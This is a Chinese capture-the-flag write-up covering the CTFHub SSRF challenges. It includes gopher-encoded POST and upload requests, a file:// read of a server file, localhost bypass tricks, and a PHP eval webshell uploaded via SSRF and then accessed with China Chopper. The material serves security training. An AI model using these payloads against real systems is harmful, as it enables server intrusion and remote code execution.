当前位置: 首页 > article >正文

cthub-ssrf通关攻略

内网访问 

一.进入页面,选择内网访问

二.开启题目,点击题目中的链接

 然后就进来页面了

三.在url里输入

http://127.0.0.1/flag.php就可以得到flag 

四.提交flag

伪协议读取文件

一开启题目

二.点击进入链接 

三.输入file:///var/www/html/flag.php 然后发现页面不显示,查看页面源代码然后就得到flag

端口扫描 

一.开启端口扫描点击如图中链接

二.进入如图所示页面输入http://127.0.0.1:8000 

 

 三.打开burp抓包,发送到攻击器

先清除playload然后再8000的地方上添加playload 

 四.如图所示修改里面的值

 五.跑出来之后点开响应包可以查看flag

post请求

一.开启题目,点击题目链接 

 二.输入http://127.0.0.1/flag.php弹出一个框

打开页面源代码,复制key粘贴到提交框中 

 三.打开brup抓包,将抓到的数据留下如图所示内容修改为gopher构造post请求数据包

四.将里面内容进行俩次url编码 

五.然后关闭抓包,再次回到页面

六.输入gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0D%0AHost:127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=6800122d69cd52dcc2aa3dafbe6c1c3c%0D%0A编号的url编码最后得出flag 

上传文件

一.点击开启,点入所给出的链接

二.进入浏览页面输入http://127.0.0.1/flag.php

出现上次文件

 发现没有提交按钮,我们自己往上写一个提交按钮

然后我们在自己写1.txt个文件进行提交

三.然后打开brup抓包 

在抓包页面进行编辑 

四.将抓好的内容进行俩次编码 

 五. 输入编码

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:129.0)%2520Gecko/20100101%2520Firefox/129.0%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=---------------------------13738711502688661258731329629%250D%250AContent-Length:%2520381%250D%250AOrigin:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests:%25201%250D%250APriority:%2520u=0,%2520i%250D%250A%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.php%2522%250D%250AContent-Type:%2520application/octet-stream%250D%250A%250D%250A%253C?php%2520@eval($_POST%255B'cmd'%255D);?%253E%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250D%250A-----------------------------137387115026886612587313296%250D%250A得到flag进行提交

FastCGl协议

开启题目

打开kali运行如图所示命令 ,利用一句话木马进行base64编码

 将上图所得的链接去url编码

然后访问shell.php 

 打开中国菜刀进行链接

链接成功后可在根目录下查看flag 

进行提交flag 

redis协议 

开启题目

进入kali输入如图所示命令 

 

将kali里给出的链接进行url编码 

编码后进行访问 

利用菜刀链接网站进入根查看flag 

提交flag 

urlbypass 

 进入链接

然后会看到下面有链接,将http://notfound.ctfhub.com输入url里面后面加上@127.0.0.1 /flag.php就会得到flag

 

 

 

数字ip bypass

开启题目,进入链接

 

 在链接后面输入http://0x7f000001/flag.php就可以得出flag

 

302跳转 

点击开启,进入链接

在后面输入http://localhost/flag.php ,然后就得出flag

dns重绑定bypass 

开启题目点击进入链接

 

输入http://localhost/flag.php就可以得到flag

 


http://www.kler.cn/a/281781.html

相关文章:

  • 探究IOC容器刷新环节初始化前的预处理
  • hhdb数据库介绍(9-21)
  • IDEA 开发工具常用快捷键有哪些?
  • 【期权懂|个股期权中的备兑开仓策略是如何进行的?
  • 独立站干货:WordPress主机推荐
  • 移动应用开发:使用Android Studio 实现登录页与注册页跳转
  • 【有来开源组织】开发规范手册
  • 【系统架构设计师-2016年】综合知识-答案及详解
  • Runtime:源码解析Golang 的map实现原理
  • 《软件工程导论》(第6版)第1章 软件工程学概述 复习笔记
  • 【Qt】QLCDNumber | QProgressBar | QCalendarWidget
  • GPT-4、Claude 3 Opus 和 Gemini 1.0 Ultra 挑战控制工程的新领域
  • docker——compose容器编排!!!
  • RPC(Remote Procedure Call,远程过程调用)实现跨进程级别调用的原理
  • 数分基础(03-3)客户特征分析--Tableau
  • Java nio Pipe 结合 Select
  • 爆改YOLOv8|利用全新的聚焦式线性注意力模块Focused Linear Attention 改进yolov8(v1)
  • AI的未来已来:GPT-4商业应用带来的无限可能
  • 炫我云渲染系统搭载倍联德液冷工作站,亮相IOTE 2024国际物联网展
  • 8.29T2 国际象棋(构造:棋盘拆分成小方阵)
  • Phenaki——文本描述生成动画或视频,动态视频序列。
  • Linux 内核源码分析---组播/策略路由选择
  • 基于Spark的云南旅游大数据分析平台
  • SpringBoot项目中mybatis执行sql很慢的排查改造过程(Interceptor插件、fetchSize、隐式转换等)
  • [解决]autoconf: command not found
  • 【保姆级WebStorm安装!!!】